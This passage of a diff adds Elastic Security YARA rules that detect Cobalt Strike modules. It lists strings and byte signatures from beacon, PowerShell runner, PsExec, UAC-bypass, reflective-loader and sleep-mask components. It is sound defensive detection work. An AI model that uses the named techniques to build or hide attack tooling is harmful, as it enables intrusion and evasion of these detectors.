     449 + $a12 = "%d is an x64 process (can't inject x86 content)" ascii fullword
     450 + $a13 = "%d is an x86 process (can't inject x64 content)" ascii fullword
     451 + $a14 = "Failed to impersonate logged on user %d (%u)" ascii fullword
     452 + $a15 = "could not create remote thread in %d: %d" ascii fullword
     453 + $a16 = "%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     454 + $a17 = "could not write to process memory: %d" ascii fullword
     455 + $a18 = "Could not create service %s on %s: %d" ascii fullword
     456 + $a19 = "Could not delete service %s on %s: %d" ascii fullword
     457 + $a20 = "Could not open process token: %d (%u)" ascii fullword
     458 + $a21 = "%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     459 + $a22 = "Could not start service %s on %s: %d" ascii fullword
     460 + $a23 = "Could not query service %s on %s: %d" ascii fullword
     461 + $a24 = "Could not connect to pipe (%s): %d" ascii fullword
     462 + $a25 = "%s.1%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     463 + $a26 = "could not spawn %s (token): %d" ascii fullword
     464 + $a27 = "could not open process %d: %d" ascii fullword
     465 + $a28 = "could not run %s as %s\\%s: %d" ascii fullword
     466 + $a29 = "%s.1%08x%08x%08x%08x.%x%x.%s" ascii fullword
     467 + $a30 = "kerberos ticket use failed:" ascii fullword
     468 + $a31 = "Started service %s on %s" ascii fullword
     469 + $a32 = "%s.1%08x%08x%08x.%x%x.%s" ascii fullword
     470 + $a33 = "I'm already in SMB mode" ascii fullword
     471 + $a34 = "could not spawn %s: %d" ascii fullword
     472 + $a35 = "could not open %s: %d" ascii fullword
     473 + $a36 = "%s.1%08x%08x.%x%x.%s" ascii fullword
     474 + $a37 = "Could not open '%s'" ascii fullword
     475 + $a38 = "%s.1%08x.%x%x.%s" ascii fullword
     476 + $a39 = "%s as %s\\%s: %d" ascii fullword
     477 + $a40 = "%s.1%x.%x%x.%s" ascii fullword
     478 + $a41 = "beacon.x64.dll" ascii fullword
     479 + $a42 = "%s on %s: %d" ascii fullword
     480 + $a43 = "www6.%x%x.%s" ascii fullword
     481 + $a44 = "cdn.%x%x.%s" ascii fullword
     482 + $a45 = "api.%x%x.%s" ascii fullword
     483 + $a46 = "%s (admin)" ascii fullword
     484 + $a47 = "beacon.dll" ascii fullword
     485 + $a48 = "%s%s: %s" ascii fullword
     486 + $a49 = "@%d.%s" ascii fullword
     487 + $a50 = "%02d/%02d/%02d %02d:%02d:%02d" ascii fullword
     488 + $a51 = "Content-Length: %d" ascii fullword
     489 + condition:
     490 + 6 of ($a*)
     491 +}
     492 + 
     493 +rule Windows_Trojan_CobaltStrike_9c0d5561 {
     494 + meta:
     495 + author = "Elastic Security"
     496 + id = "9c0d5561-5b09-44ae-8e8c-336dee606199"
     497 + fingerprint = "01d53fcdb320f0cd468a2521c3e96dcb0b9aa00e7a7a9442069773c6b3759059"
     498 + creation_date = "2021-03-23"
     499 + last_modified = "2021-10-04"
     500 + description = "Identifies PowerShell Runner module from Cobalt Strike"
     501 + threat_name = "Windows.Trojan.CobaltStrike"
     502 + severity = 100
     503 + arch_context = "x86"
     504 + scan_context = "file, memory"
     505 + license = "Elastic License v2"
     506 + os = "windows"
     507 + strings:
     508 + $a1 = "PowerShellRunner.dll" wide fullword
     509 + $a2 = "powershell.x64.dll" ascii fullword
     510 + $a3 = "powershell.dll" ascii fullword
     511 + $a4 = "\\\\.\\pipe\\powershell" ascii fullword
     512 + $b1 = "PowerShellRunner.PowerShellRunner" ascii fullword
     513 + $b2 = "Failed to invoke GetOutput w/hr 0x%08lx" ascii fullword
     514 + $b3 = "Failed to get default AppDomain w/hr 0x%08lx" ascii fullword
     515 + $b4 = "ICLRMetaHost::GetRuntime (v4.0.30319) failed w/hr 0x%08lx" ascii fullword
     516 + $b5 = "CustomPSHostUserInterface" ascii fullword
     517 + $b6 = "RuntimeClrHost::GetCurrentAppDomainId failed w/hr 0x%08lx" ascii fullword
     518 + $b7 = "ICorRuntimeHost::GetDefaultDomain failed w/hr 0x%08lx" ascii fullword
     519 + $c1 = { 8B 08 50 FF 51 08 8B 7C 24 1C 8D 4C 24 10 51 C7 }
     520 + $c2 = "z:\\devcenter\\aggressor\\external\\PowerShellRunner\\obj\\Release\\PowerShellRunner.pdb" ascii fullword
     521 + condition:
     522 + (1 of ($a*) and 4 of ($b*)) or 1 of ($c*)
     523 +}
     524 + 
     525 +rule Windows_Trojan_CobaltStrike_59ed9124 {
     526 + meta:
     527 + author = "Elastic Security"
     528 + id = "59ed9124-bc20-4ea6-b0a7-63ee3359e69c"
     529 + fingerprint = "7823e3b98e55a83bf94b0f07e4c116dbbda35adc09fa0b367f8a978a80c2efff"
     530 + creation_date = "2021-03-23"
     531 + last_modified = "2021-08-23"
     532 + description = "Identifies PsExec module from Cobalt Strike"
     533 + threat_name = "Windows.Trojan.CobaltStrike"
     534 + severity = 100
     535 + arch_context = "x86"
     536 + scan_context = "file, memory"
     537 + license = "Elastic License v2"
     538 + os = "windows"
     539 + strings:
     540 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\psexec_command.x64.o" ascii fullword
     541 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\psexec_command.x86.o" ascii fullword
     542 + $b1 = "__imp_BeaconDataExtract" ascii fullword
     543 + $b2 = "__imp_BeaconDataParse" ascii fullword
     544 + $b3 = "__imp_BeaconDataParse" ascii fullword
     545 + $b4 = "__imp_BeaconDataParse" ascii fullword
     546 + $b5 = "__imp_ADVAPI32$StartServiceA" ascii fullword
     547 + $b6 = "__imp_ADVAPI32$DeleteService" ascii fullword
     548 + $b7 = "__imp_ADVAPI32$QueryServiceStatus" ascii fullword
     549 + $b8 = "__imp_ADVAPI32$CloseServiceHandle" ascii fullword
     550 + $c1 = "__imp__BeaconDataExtract" ascii fullword
     551 + $c2 = "__imp__BeaconDataParse" ascii fullword
     552 + $c3 = "__imp__BeaconDataParse" ascii fullword
     553 + $c4 = "__imp__BeaconDataParse" ascii fullword
     554 + $c5 = "__imp__ADVAPI32$StartServiceA" ascii fullword
     555 + $c6 = "__imp__ADVAPI32$DeleteService" ascii fullword
     556 + $c7 = "__imp__ADVAPI32$QueryServiceStatus" ascii fullword
     557 + $c8 = "__imp__ADVAPI32$CloseServiceHandle" ascii fullword
     558 + condition:
     559 + 1 of ($a*) or 5 of ($b*) or 5 of ($c*)
     560 +}
     561 + 
     562 +rule Windows_Trojan_CobaltStrike_8a791eb7 {
     563 + meta:
     564 + author = "Elastic Security"
     565 + id = "8a791eb7-dc0c-4150-9e5b-2dc21af0c77d"
     566 + fingerprint = "4967886ba5e663f2e2dc0631939308d7d8f2194a30590a230973e1b91bd625e1"
     567 + creation_date = "2021-03-23"
     568 + last_modified = "2021-08-23"
     569 + description = "Identifies Registry module from Cobalt Strike"
     570 + threat_name = "Windows.Trojan.CobaltStrike"
     571 + severity = 100
     572 + arch_context = "x86"
     573 + scan_context = "file, memory"
     574 + license = "Elastic License v2"
     575 + os = "windows"
     576 + strings:
     577 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\registry.x64.o" ascii fullword
     578 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\registry.x86.o" ascii fullword
     579 + $b1 = "__imp_ADVAPI32$RegOpenKeyExA" ascii fullword
     580 + $b2 = "__imp_ADVAPI32$RegEnumKeyA" ascii fullword
     581 + $b3 = "__imp_ADVAPI32$RegOpenCurrentUser" ascii fullword
     582 + $b4 = "__imp_ADVAPI32$RegCloseKey" ascii fullword
     583 + $b5 = "__imp_BeaconFormatAlloc" ascii fullword
     584 + $b6 = "__imp_BeaconOutput" ascii fullword
     585 + $b7 = "__imp_BeaconFormatFree" ascii fullword
     586 + $b8 = "__imp_BeaconDataPtr" ascii fullword
     587 + $c1 = "__imp__ADVAPI32$RegOpenKeyExA" ascii fullword
     588 + $c2 = "__imp__ADVAPI32$RegEnumKeyA" ascii fullword
     589 + $c3 = "__imp__ADVAPI32$RegOpenCurrentUser" ascii fullword
     590 + $c4 = "__imp__ADVAPI32$RegCloseKey" ascii fullword
     591 + $c5 = "__imp__BeaconFormatAlloc" ascii fullword
     592 + $c6 = "__imp__BeaconOutput" ascii fullword
     593 + $c7 = "__imp__BeaconFormatFree" ascii fullword
     594 + $c8 = "__imp__BeaconDataPtr" ascii fullword
     595 + condition:
     596 + 1 of ($a*) or 5 of ($b*) or 5 of ($c*)
     597 +}
     598 + 
     599 +rule Windows_Trojan_CobaltStrike_d00573a3 {
     600 + meta:
     601 + author = "Elastic Security"
     602 + id = "d00573a3-db26-4e6b-aabf-7af4a818f383"
     603 + fingerprint = "b6fa0792b99ea55f359858d225685647f54b55caabe53f58b413083b8ad60e79"
     604 + creation_date = "2021-03-23"
     605 + last_modified = "2021-08-23"
     606 + description = "Identifies Screenshot module from Cobalt Strike"
     607 + threat_name = "Windows.Trojan.CobaltStrike"
     608 + severity = 100
     609 + arch_context = "x86"
     610 + scan_context = "file, memory"
     611 + license = "Elastic License v2"
     612 + os = "windows"
     613 + strings:
     614 + $a1 = "screenshot.x64.dll" ascii fullword
     615 + $a2 = "screenshot.dll" ascii fullword
     616 + $a3 = "\\\\.\\pipe\\screenshot" ascii fullword
     617 + $b1 = "1I1n1Q3M5Q5U5Y5]5a5e5i5u5{5" ascii fullword
     618 + $b2 = "GetDesktopWindow" ascii fullword
     619 + $b3 = "CreateCompatibleBitmap" ascii fullword
     620 + $b4 = "GDI32.dll" ascii fullword
     621 + $b5 = "ReflectiveLoader"
     622 + $b6 = "Adobe APP14 marker: version %d, flags 0x%04x 0x%04x, transform %d" ascii fullword
     623 + condition:
     624 + 2 of ($a*) or 5 of ($b*)
     625 +}
     626 + 
     627 +rule Windows_Trojan_CobaltStrike_7bcd759c {
     628 + meta:
     629 + author = "Elastic Security"
     630 + id = "7bcd759c-8e3d-4559-9381-1f4fe8b3dd95"
     631 + fingerprint = "553085f1d1ca8dcd797360b287951845753eee7370610a1223c815a200a5ed20"
     632 + creation_date = "2021-03-23"
     633 + last_modified = "2021-08-23"
     634 + description = "Identifies SSH Agent module from Cobalt Strike"
     635 + threat_name = "Windows.Trojan.CobaltStrike"
     636 + severity = 100
     637 + arch_context = "x86"
     638 + scan_context = "file, memory"
     639 + license = "Elastic License v2"
     640 + os = "windows"
     641 + strings:
     642 + $a1 = "sshagent.x64.dll" ascii fullword
     643 + $a2 = "sshagent.dll" ascii fullword
     644 + $b1 = "\\\\.\\pipe\\sshagent" ascii fullword
     645 + $b2 = "\\\\.\\pipe\\PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ascii fullword
     646 + condition:
     647 + 1 of ($a*) and 1 of ($b*)
     648 +}
     649 + 
     650 +rule Windows_Trojan_CobaltStrike_a56b820f {
     651 + meta:
     652 + author = "Elastic Security"
     653 + id = "a56b820f-0a20-4054-9c2d-008862646a78"
     654 + fingerprint = "5418e695bcb1c37e72a7ff24a39219dc12b3fe06c29cedefd500c5e82c362b6d"
     655 + creation_date = "2021-03-23"
     656 + last_modified = "2021-08-23"
     657 + description = "Identifies Timestomp module from Cobalt Strike"
     658 + threat_name = "Windows.Trojan.CobaltStrike"
     659 + severity = 100
     660 + arch_context = "x86"
     661 + scan_context = "file, memory"
     662 + license = "Elastic License v2"
     663 + os = "windows"
     664 + strings:
     665 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\timestomp.x64.o" ascii fullword
     666 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\timestomp.x86.o" ascii fullword
     667 + $b1 = "__imp_KERNEL32$GetFileTime" ascii fullword
     668 + $b2 = "__imp_KERNEL32$SetFileTime" ascii fullword
     669 + $b3 = "__imp_KERNEL32$CloseHandle" ascii fullword
     670 + $b4 = "__imp_KERNEL32$CreateFileA" ascii fullword
     671 + $b5 = "__imp_BeaconDataExtract" ascii fullword
     672 + $b6 = "__imp_BeaconPrintf" ascii fullword
     673 + $b7 = "__imp_BeaconDataParse" ascii fullword
     674 + $b8 = "__imp_BeaconDataExtract" ascii fullword
     675 + $c1 = "__imp__KERNEL32$GetFileTime" ascii fullword
     676 + $c2 = "__imp__KERNEL32$SetFileTime" ascii fullword
     677 + $c3 = "__imp__KERNEL32$CloseHandle" ascii fullword
     678 + $c4 = "__imp__KERNEL32$CreateFileA" ascii fullword
     679 + $c5 = "__imp__BeaconDataExtract" ascii fullword
     680 + $c6 = "__imp__BeaconPrintf" ascii fullword
     681 + $c7 = "__imp__BeaconDataParse" ascii fullword
     682 + $c8 = "__imp__BeaconDataExtract" ascii fullword
     683 + condition:
     684 + 1 of ($a*) or 5 of ($b*) or 5 of ($c*)
     685 +}
     686 + 
     687 +rule Windows_Trojan_CobaltStrike_92f05172 {
     688 + meta:
     689 + author = "Elastic Security"
     690 + id = "92f05172-f15c-4077-a958-b8490378bf08"
     691 + fingerprint = "09b1f7087d45fb4247a33ae3112910bf5426ed750e1e8fe7ba24a9047b76cc82"
     692 + creation_date = "2021-03-23"
     693 + last_modified = "2021-08-23"
     694 + description = "Identifies UAC cmstp module from Cobalt Strike"
     695 + threat_name = "Windows.Trojan.CobaltStrike"
     696 + severity = 100
     697 + arch_context = "x86"
     698 + scan_context = "file, memory"
     699 + license = "Elastic License v2"
     700 + os = "windows"
     701 + strings:
     702 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uaccmstp.x64.o" ascii fullword
     703 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uaccmstp.x86.o" ascii fullword
     704 + $b1 = "elevate_cmstp" ascii fullword
     705 + $b2 = "$pdata$elevate_cmstp" ascii fullword
     706 + $b3 = "$unwind$elevate_cmstp" ascii fullword
     707 + $c1 = "_elevate_cmstp" ascii fullword
     708 + $c2 = "__imp__OLE32$CoGetObject@16" ascii fullword
     709 + $c3 = "__imp__KERNEL32$GetModuleFileNameA@12" ascii fullword
     710 + $c4 = "__imp__KERNEL32$GetSystemWindowsDirectoryA@8" ascii fullword
     711 + $c5 = "OLDNAMES"
     712 + $c6 = "__imp__BeaconDataParse" ascii fullword
     713 + $c7 = "_willAutoElevate" ascii fullword
     714 + condition:
     715 + 1 of ($a*) or 3 of ($b*) or 4 of ($c*)
     716 +}
     717 + 
     718 +rule Windows_Trojan_CobaltStrike_417239b5 {
     719 + meta:
     720 + author = "Elastic Security"
     721 + id = "417239b5-cf2d-4c85-a022-7a8459c26793"
     722 + fingerprint = "292afee829e838f9623547f94d0561e8a9115ce7f4c40ae96c6493f3cc5ffa9b"
     723 + creation_date = "2021-03-23"
     724 + last_modified = "2021-08-23"
     725 + description = "Identifies UAC token module from Cobalt Strike"
     726 + threat_name = "Windows.Trojan.CobaltStrike"
     727 + severity = 100
     728 + arch_context = "x86"
     729 + scan_context = "file, memory"
     730 + license = "Elastic License v2"
     731 + os = "windows"
     732 + strings:
     733 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uactoken.x64.o" ascii fullword
     734 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uactoken.x86.o" ascii fullword
     735 + $a3 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uactoken2.x64.o" ascii fullword
     736 + $a4 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uactoken2.x86.o" ascii fullword
     737 + $b1 = "$pdata$is_admin_already" ascii fullword
     738 + $b2 = "$unwind$is_admin" ascii fullword
     739 + $b3 = "$pdata$is_admin" ascii fullword
     740 + $b4 = "$unwind$is_admin_already" ascii fullword
     741 + $b5 = "$pdata$RunAsAdmin" ascii fullword
     742 + $b6 = "$unwind$RunAsAdmin" ascii fullword
     743 + $b7 = "is_admin_already" ascii fullword
     744 + $b8 = "is_admin" ascii fullword
     745 + $b9 = "process_walk" ascii fullword
     746 + $b10 = "get_current_sess" ascii fullword
     747 + $b11 = "elevate_try" ascii fullword
     748 + $b12 = "RunAsAdmin" ascii fullword
     749 + $b13 = "is_ctfmon" ascii fullword
     750 + $c1 = "_is_admin_already" ascii fullword
     751 + $c2 = "_is_admin" ascii fullword
     752 + $c3 = "_process_walk" ascii fullword
     753 + $c4 = "_get_current_sess" ascii fullword
     754 + $c5 = "_elevate_try" ascii fullword
     755 + $c6 = "_RunAsAdmin" ascii fullword
     756 + $c7 = "_is_ctfmon" ascii fullword
     757 + $c8 = "_reg_query_dword" ascii fullword
     758 + $c9 = ".drectve" ascii fullword
     759 + $c10 = "_is_candidate" ascii fullword
     760 + $c11 = "_SpawnAsAdmin" ascii fullword
     761 + $c12 = "_SpawnAsAdminX64" ascii fullword
     762 + condition:
     763 + 1 of ($a*) or 9 of ($b*) or 7 of ($c*)
     764 +}
     765 + 
     766 +rule Windows_Trojan_CobaltStrike_29374056 {
     767 + meta:
     768 + author = "Elastic Security"
     769 + id = "29374056-03ce-484b-8b2d-fbf75be86e27"
     770 + fingerprint = "4cd7552a499687ac0279fb2e25722f979fc5a22afd1ea4abba14a2ef2002dd0f"
     771 + creation_date = "2021-03-23"
     772 + last_modified = "2021-08-23"
     773 + description = "Identifies Cobalt Strike MZ Reflective Loader."
     774 + threat_name = "Windows.Trojan.CobaltStrike"
     775 + severity = 100
     776 + arch_context = "x86"
     777 + scan_context = "file, memory"
     778 + license = "Elastic License v2"
     779 + os = "windows"
     780 + strings:
     781 + $a1 = { 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D ?? FF FF FF 48 81 C3 ?? ?? 00 00 FF D3 }
     782 + $a2 = { 4D 5A E8 00 00 00 00 5B 89 DF 52 45 55 89 E5 }
     783 + condition:
     784 + 1 of ($a*)
     785 +}
     786 + 
     787 +rule Windows_Trojan_CobaltStrike_949f10e3 {
     788 + meta:
     789 + author = "Elastic Security"
     790 + id = "949f10e3-68c9-4600-a620-ed3119e09257"
     791 + fingerprint = "34e04901126a91c866ebf61a61ccbc3ce0477d9614479c42d8ce97a98f2ce2a7"
     792 + creation_date = "2021-03-25"
     793 + last_modified = "2021-08-23"
     794 + description = "Identifies the API address lookup function used by Cobalt Strike along with XOR implementation by Cobalt Strike."
     795 + threat_name = "Windows.Trojan.CobaltStrike"
     796 + severity = 100
     797 + arch_context = "x86"
     798 + scan_context = "file, memory"
     799 + license = "Elastic License v2"
     800 + os = "windows"
     801 + strings:
     802 + $a1 = { 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61 }
     803 + $a2 = { 8B 07 01 C3 85 C0 75 E5 58 C3 E8 [2] FF FF 31 39 32 2E 31 36 38 2E ?? 2E }
     804 + condition:
     805 + all of them
     806 +}
     807 + 
     808 +rule Windows_Trojan_CobaltStrike_8751cdf9 {
     809 + meta:
     810 + author = "Elastic Security"
     811 + id = "8751cdf9-4038-42ba-a6eb-f8ac579a4fbb"
     812 + fingerprint = "0988386ef4ba54dd90b0cf6d6a600b38db434e00e569d69d081919cdd3ea4d3f"
     813 + creation_date = "2021-03-25"
     814 + last_modified = "2021-08-23"
     815 + description = "Identifies Cobalt Strike wininet reverse shellcode along with XOR implementation by Cobalt Strike."
     816 + threat_name = "Windows.Trojan.CobaltStrike"
     817 + severity = 99
     818 + arch_context = "x86"
     819 + scan_context = "file, memory"
     820 + license = "Elastic License v2"
     821 + os = "windows"
     822 + strings:
     823 + $a1 = { 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07 }
     824 + $a2 = { 8B 07 01 C3 85 C0 75 E5 58 C3 E8 [2] FF FF 31 39 32 2E 31 36 38 2E ?? 2E }
     825 + condition:
     826 + all of them
     827 +}
     828 + 
     829 +rule Windows_Trojan_CobaltStrike_8519072e {
     830 + meta:
     831 + author = "Elastic Security"
     832 + id = "8519072e-3e43-470b-a3cf-18f92b3f31a2"
     833 + fingerprint = "9fc88b798083adbcf25f9f0b35fbb5035a98cdfe55377de96fa0353821de1cc8"
     834 + creation_date = "2021-03-25"
     835 + last_modified = "2021-10-04"
     836 + description = "Identifies Cobalt Strike trial/default versions"
     837 + threat_name = "Windows.Trojan.CobaltStrike"
     838 + severity = 90
     839 + arch_context = "x86"
     840 + scan_context = "file, memory"
     841 + license = "Elastic License v2"
     842 + os = "windows"
     843 + strings:
     844 + $a1 = "User-Agent:"
     845 + $a2 = "wini"
     846 + $a3 = "5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" ascii fullword
     847 + $a4 = /[^0-9";.\/]([0-9]{1,3}\.){3}[0-9]{1,3}[^0-9";.\/]/
     848 + condition:
     849 + all of them
     850 +}
     851 + 
     852 +rule Windows_Trojan_CobaltStrike_663fc95d {
     853 + meta:
     854 + author = "Elastic Security"
     855 + id = "663fc95d-2472-4d52-ad75-c5d86cfc885f"
     856 + fingerprint = "d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48"
     857 + creation_date = "2021-04-01"
     858 + last_modified = "2021-12-17"
     859 + description = "Identifies CobaltStrike via unidentified function code"
     860 + threat_name = "Windows.Trojan.CobaltStrike"
     861 + severity = 100
     862 + arch_context = "x86"
     863 + scan_context = "file, memory"
     864 + license = "Elastic License v2"
     865 + os = "windows"
     866 + strings:
     867 + $a = { 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00 }
     868 + condition:
     869 + all of them
     870 +}
     871 + 
     872 +rule Windows_Trojan_CobaltStrike_b54b94ac {
     873 + meta:
     874 + author = "Elastic Security"
     875 + id = "b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca"
     876 + fingerprint = "2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8"
     877 + creation_date = "2021-10-21"
     878 + last_modified = "2022-01-13"
     879 + description = "Rule for beacon sleep obfuscation routine"
     880 + threat_name = "Windows.Trojan.CobaltStrike"
     881 + reference_sample = "36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a"
     882 + severity = 100
     883 + arch_context = "x86"
     884 + scan_context = "file, memory"
     885 + license = "Elastic License v2"
     886 + os = "windows"
     887 + strings:
     888 + $a_x64 = { 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03 }
     889 + $a_x64_smbtcp = { 4C 8B 07 B8 4F EC C4 4E 41 F7 E1 41 8B C1 C1 EA 02 41 FF C1 6B D2 0D 2B C2 8A 4C 38 10 42 30 0C 06 48 }
     890 + $a_x86 = { 8B 46 04 8B 08 8B 50 04 83 C0 08 89 55 08 89 45 0C 85 C9 75 04 85 D2 74 23 3B CA 73 E6 8B 06 8D 3C 08 33 D2 }
     891 + $a_x86_2 = { 8B 06 8D 3C 08 33 D2 6A 0D 8B C1 5B F7 F3 8A 44 32 08 30 07 41 3B 4D 08 72 E6 8B 45 FC EB C7 }
     892 + $a_x86_smbtcp = { 8B 07 8D 34 08 33 D2 6A 0D 8B C1 5B F7 F3 8A 44 3A 08 30 06 41 3B 4D 08 72 E6 8B 45 FC EB }
     893 + condition:
     894 + any of them
     895 +}
     896 + 
     897 +rule Windows_Trojan_CobaltStrike_f0b627fc {
     898 + meta:
     899 + author = "Elastic Security"
     900 + id = "f0b627fc-97cd-42cb-9eae-1efb0672762d"
     901 + fingerprint = "fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1"
     902 + creation_date = "2021-10-21"
     903 + last_modified = "2022-01-13"
     904 + description = "Rule for beacon reflective loader"
     905 + threat_name = "Windows.Trojan.CobaltStrike"
     906 + reference_sample = "b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b"
     907 + severity = 100
     908 + arch_context = "x86"
     909 + scan_context = "file, memory"
     910 + license = "Elastic License v2"
     911 + os = "windows"
     912 + strings:
     913 + $beacon_loader_x64 = { 25 FF FF FF 00 3D 41 41 41 00 75 [5-10] 25 FF FF FF 00 3D 42 42 42 00 75 }
     914 + $beacon_loader_x86 = { 25 FF FF FF 00 3D 41 41 41 00 75 [4-8] 81 E1 FF FF FF 00 81 F9 42 42 42 00 75 }
     915 + $beacon_loader_x86_2 = { 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 [4-8] 81 E2 FF FF FF 00 81 FA 42 42 42 00 75 }
     916 + $generic_loader_x64 = { 89 44 24 20 48 8B 44 24 40 0F BE 00 8B 4C 24 20 03 C8 8B C1 89 44 24 20 48 8B 44 24 40 48 FF C0 }
     917 + $generic_loader_x86 = { 83 C4 04 89 45 FC 8B 4D 08 0F BE 11 03 55 FC 89 55 FC 8B 45 08 83 C0 01 89 45 08 8B 4D 08 0F BE }
     918 + condition:
     919 + any of them
     920 +}
     921 + 
     922 +rule Windows_Trojan_CobaltStrike_dcdcdd8c {
     923 + meta:
     924 + author = "Elastic Security"
     925 + id = "dcdcdd8c-7395-4453-a74a-60ab8e251a5a"
     926 + fingerprint = "8aed1ae470d06a7aac37896df22b2f915c36845099839a85009212d9051f71e9"
     927 + creation_date = "2021-10-21"
     928 + last_modified = "2022-01-13"
     929 + description = "Rule for beacon sleep PDB"
     930 + threat_name = "Windows.Trojan.CobaltStrike"
     931 + reference_sample = "36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a"
     932 + severity = 100
     933 + arch_context = "x86"
     934 + scan_context = "file, memory"
     935 + license = "Elastic License v2"
     936 + os = "windows"
     937 + strings:
     938 + $a1 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask.x64.o" ascii fullword
     939 + $a2 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask.x86.o" ascii fullword
     940 + $a3 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask_smb.x64.o" ascii fullword
     941 + $a4 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask_smb.x86.o" ascii fullword
     942 + $a5 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask_tcp.x64.o" ascii fullword
     943 + $a6 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask_tcp.x86.o" ascii fullword
     944 + condition:
     945 + any of them
     946 +}
     947 + 
     948 +rule Windows_Trojan_CobaltStrike_a3fb2616 {
     949 + meta:
     950 + author = "Elastic Security"
     951 + id = "a3fb2616-b03d-4399-9342-0fc684fb472e"
     952 + fingerprint = "c15cf6aa7719dac6ed21c10117f28eb4ec56335f80a811b11ab2901ad36f8cf0"
     953 + creation_date = "2021-10-21"
     954 + last_modified = "2022-01-13"
     955 + description = "Rule for browser pivot "
     956 + threat_name = "Windows.Trojan.CobaltStrike"
     957 + reference_sample = "36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a"
     958 + severity = 100
     959 + arch_context = "x86"
     960 + scan_context = "file, memory"
     961 + license = "Elastic License v2"
     962 + os = "windows"
     963 + strings:
     964 + $a1 = "browserpivot.dll" ascii fullword
     965 + $a2 = "browserpivot.x64.dll" ascii fullword
     966 + $b1 = "$$$THREAD.C$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$" ascii fullword
     967 + $b2 = "COBALTSTRIKE" ascii fullword
     968 + condition:
     969 + 1 of ($a*) and 2 of ($b*)
     970 +}
     971 + 
     972 +rule Windows_Trojan_CobaltStrike_8ee55ee5 {
     973 + meta:
     974 + author = "Elastic Security"
     975 + id = "8ee55ee5-67f1-4f94-ab93-62bb5cfbeee9"
     976 + fingerprint = "7e7ed4f00d0914ce0b9f77b6362742a9c8b93a16a6b2a62b70f0f7e15ba3a72b"
     977 + creation_date = "2021-10-21"
     978 + last_modified = "2022-01-13"
     979 + description = "Rule for wmi exec module"
     980 + threat_name = "Windows.Trojan.CobaltStrike"
     981 + reference_sample = "36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a"
     982 + severity = 100
     983 + arch_context = "x86"
     984 + scan_context = "file, memory"
     985 + license = "Elastic License v2"
     986 + os = "windows"
     987 + strings:
     988 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\wmiexec.x64.o" ascii fullword
     989 + $a2 = "z:\\devcenter\\aggressor\\external\\pxlib\\bin\\wmiexec.x86.o" ascii fullword
     990 + condition:
     991 + 1 of ($a*)
     992 +}
     993 + 
     994 +rule Windows_Trojan_CobaltStrike_8d5963a2 {
     995 + meta:
     996 + author = "Elastic Security"
     997 + id = "8d5963a2-54a9-4705-9f34-0d5f8e6345a2"
     998 + fingerprint = "228cd65380cf4b04f9fd78e8c30c3352f649ce726202e2dac9f1a96211925e1c"
     999 + creation_date = "2022-08-10"
     1000 + last_modified = "2022-09-29"
     1001 + threat_name = "Windows.Trojan.CobaltStrike"
     1002 + reference_sample = "9fe43996a5c4e99aff6e2a1be743fedec35e96d1e6670579beb4f7e7ad591af9"
     1003 + severity = 100
     1004 + arch_context = "x86"
     1005 + scan_context = "file, memory"
     1006 + license = "Elastic License v2"
     1007 + os = "windows"
     1008 + strings:
     1009 + $a = { 40 55 53 56 57 41 54 41 55 41 56 41 57 48 8D 6C 24 D8 48 81 EC 28 01 00 00 45 33 F6 48 8B D9 48 }
     1010 + condition:
     1011 + all of them
     1012 +}
     1013 + 
     1014 +rule Windows_Trojan_CobaltStrike_1787eef5 {
     1015 + meta:
     1016 + author = "Elastic Security"
     1017 + id = "1787eef5-ff00-4e19-bd22-c5dfc9488c7b"
